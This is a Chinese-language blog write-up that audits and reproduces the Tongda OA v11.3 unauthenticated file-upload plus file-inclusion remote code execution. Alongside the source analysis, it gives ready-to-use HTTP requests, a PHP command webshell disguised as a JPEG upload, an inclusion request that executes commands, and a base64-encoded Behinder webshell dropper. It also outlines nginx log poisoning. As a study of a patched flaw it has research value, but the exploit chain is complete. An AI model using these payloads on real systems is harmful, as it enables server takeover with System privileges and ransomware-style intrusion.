0x01 漏洞说明

通达OA是由北京通达信科科技有限公司研发的一套通用型OA产品。而近日，通达OA在官方论坛发布了紧急通知，提供了针对部分用户反馈遭受勒索病毒攻击的安全加固程序。

通过在 v11.3 版本的测试发现全版本的文件上传结合 v11 版本的文件包含漏洞可以造成远程命令执行，且默认为 System 权限。攻击者可成功上传 webshell 控制服务器。

官网最新的 v11.4 版本应该是修复版本。

0x02 影响版本

V11版
2017版
2016版
2015版
2013版
2013增强版

版本不同路径不同

2013：

• 文件上传路径：/ispirit/im/upload.php

• 文件包含路径：/ispirit/interface/gateway.php

2017：

• 文件上传路径：/ispirit/im/upload.php

• 文件包含路径：/mac/gateway.php

这里具体的验证下来我发现，有些版本两个文件包含的路径都不存在，不知道具体的情况是什么样的。

0x03 源码分析

本着学习的态度，跟着网上的一些文章进行代码审计

分析版本：v11.3

1. 文件包含：ispirit/interface/gateway.php

image

代码经过了加密，采用的是 zend ，网上有在线解密工具 http://dezend.qiling.org/free/

<?php
//decode by http://dezend.qiling.org  QQ 2859470
​
ob_start();
include_once 'inc/session.php';
include_once 'inc/conn.php';
include_once 'inc/utility_org.php';
if ($P != '') {
 if (preg_match('/[^a-z0-9;]+/i', $P)) {
 echo _('非法参数');
 exit;
 }
 session_id($P);
 session_start();
 session_write_close();
 if ($_SESSION['LOGIN_USER_ID'] == '' || $_SESSION['LOGIN_UID'] == '') {
 echo _('RELOGIN');
 exit;
 }
}
if ($json) {
 $json = stripcslashes($json);
 $json = (array) json_decode($json);
 foreach ($json as $key => $val) {
 if ($key == 'data') {
 $val = (array) $val;
 foreach ($val as $keys => $value) {
 ${$keys} = $value;
 }
 }
 if ($key == 'url') {
 $url = $val;
 }
 }
 if ($url != '') {
 if (substr($url, 0, 1) == '/') {
 $url = substr($url, 1);
 }
 if (strpos($url, 'general/') !== false || strpos($url, 'ispirit/') !== false || strpos($url, 'module/') !== false) {
 include_once $url;
 }
 }
 exit;
}

image

最开始的代码里，可以看到，如果 $P 不为空，则对 SESSION 进行登陆验证。

但是此处如果 $P 未空的情况下，可直接绕过身份认证继续执行下面的代码程序。

image

strpos() 函数，查找字符串在另一个字符串第一次出现的位置；!== 表示不全等。

这里简单来讲 $url 的值里需要有 general/ ispirit/ module/ 中的一个就可进入条件，触发包含。

image

回头看 $url 是如何来的，首先通过 stripcslashes() 函数删除字符串中的反斜杠，

然后将字符串转化为数组，通过 foreach 遍历数组，将键为 url 的值赋给 $url。

总结：

1. $P 为空可绕过身份验证

2. $json 的数据中，需要有 url 这个键，且其值需要包含general/ ispirit/ module/中的一个

3. 利用：包含日志、远程文件包含（通过SMB或者webdav进行bypass）、包含上传文件

4. 可通过 ../ 来跨目录

2. 文件上传：ispirit/im/upload.php

全部源码太长就不贴了。

image

$P 接受POST传递过来值，当 P 传的值为空，则进入 auth.php 进行登陆认证。而 P 不为空时，可以绕过登陆认证。

image

判断 $DEST_UID 是否为空；其次如果 DEST_UID 中存在有 , 则通过 intval() 获取整数值；最后当 $DEST_UID=0 时，UPLOAD_MODE 要为2，否则接收方ID无效。

image

跟进 upload() 函数 inc/utility_file.php ，有一个 is_uploadable() 函数进行后缀校验

image

通过 strrpos() 函数获取 $FILE_NAME 最后一个 . 后的三个字符串且不能为 php 的文件。如果想绕过这个函数可以采用 1.php. 的形式。这里由于不在web目录下，所以不用纠结，需要配合包含解析。

总结：

1. POST传入的 P 非空

2. DEST_UID 不为空

3. UPLOAD_MODE 可以为1，2，3， DEST_UID 但为0时，UPLOAD_MODE 必须为2

4. file的 name 需设置成 ATTACHMENT

0x03 漏洞复现

安装配置

这里下载的是 v11.3 版本

image

安装过程需要配置一下端口

image

image

默认的登陆账号密码：

admin : null

文件上传

<!DOCTYPE html>
<html lang="en">
<head>
 <meta charset="UTF-8">
 <title>Title</title>
</head>
<body>
​
<h1>TDOA upload test</h1>
<form action="http://ip:port/ispirit/im/upload.php" method="post" enctype="multipart/form-data">
 <p><input type="hidden" name="P" value="123"></p>
 <p><input type="hidden" name="DEST_UID" value="4"></p>
 <p><input type="hidden" name="UPLOAD_MODE" value="1"></p>
 <p><input type="file" name="ATTACHMENT"></p>
 <p><input type="submit" value="submit"></p>
</form>
​
</body>
</html>

POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.109.141:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/up.html
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------156322138920312
Content-Length: 680
​
-----------------------------156322138920312
Content-Disposition: form-data; name="P"
​
123
-----------------------------156322138920312
Content-Disposition: form-data; name="DEST_UID"
​
4
-----------------------------156322138920312
Content-Disposition: form-data; name="UPLOAD_MODE"
​
1
-----------------------------156322138920312
Content-Disposition: form-data; name="ATTACHMENT"; filename="1.jpg"
Content-Type: image/jpeg
​
<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
-----------------------------156322138920312--

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Mar 2020 01:38:23 GMT
Content-Type: text/html; charset=gbk
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=123; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 74
​
{"status":1,"content":"[vm]252@2003_1752128412|1.jpg|0[\/vm]","file_id":1}

注意的是：通达OA默认配置了 disable_functions ；windows情况下可通过加载 COM 组件bypass

image

上传成功后的banner，上传文件在 /attach/im/2003/ 里面 ，这是一个非web目录，无法直接解析。

文件包含

1、配合文件上传包含

包含刚刚上传的文件

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 192.168.109.141:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
​
json={"url":"/general/../../attach/im/2003/1752128412.1.jpg"}&cmd=ipconfig

image

也可以通过包含写入马在当前目录下生成一个 readme.php 文件，来getshell

<?php
$fp = fopen('readme.php', 'w');
$a = base64_decode("PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9HRVRbJ3Bhc3MnXSkpCnsKICAgICRrZXk9c3Vic3RyKG1kNSh1bmlxaWQocmFuZCgpKSksMTYpOwogICAgJF9TRVNTSU9OWydrJ109JGtleTsKICAgIHByaW50ICRrZXk7Cn0KZWxzZQp7CiAgICAka2V5PSRfU0VTU0lPTlsnayddOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJCgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJHApIHtldmFsKCRwLiIiKTt9fQoJQG5ldyBDKCRwYXJhbXMpOwp9Cj8+");
fwrite($fp, $a);
fclose($fp);
?>

image

冰蝎链接，密码 pass

image

2、包含 nginx 日志

通常的利用思路：

通过文件包含，枚举得到 nginx 的配置文件，可以得到nginx错误日志的路径，和可以看到访问日志

通过抓取数据包写入恶意代码，这里踩到一个坑，开始我使用了双引号，日志文件转义了，导致包含爆500的错。也可以采用base64的方法

image

通过包含漏洞成功解析

image

有包含，能跨目录，可以尝试配合中间件各种日志等来包含。

参考文献

[通达OA RCE + Getshell] https://www.cnblogs.com/yuyan-sec/p/12549237.html

[通达OA任意文件上传和文件包含漏洞导致RCE详细代码审计分析及Poc构造复现] https://www.freebuf.com/column/230871.html

[利用nginx日志结合本地包含漏洞GetShell] https://segmentfault.com/a/1190000009809346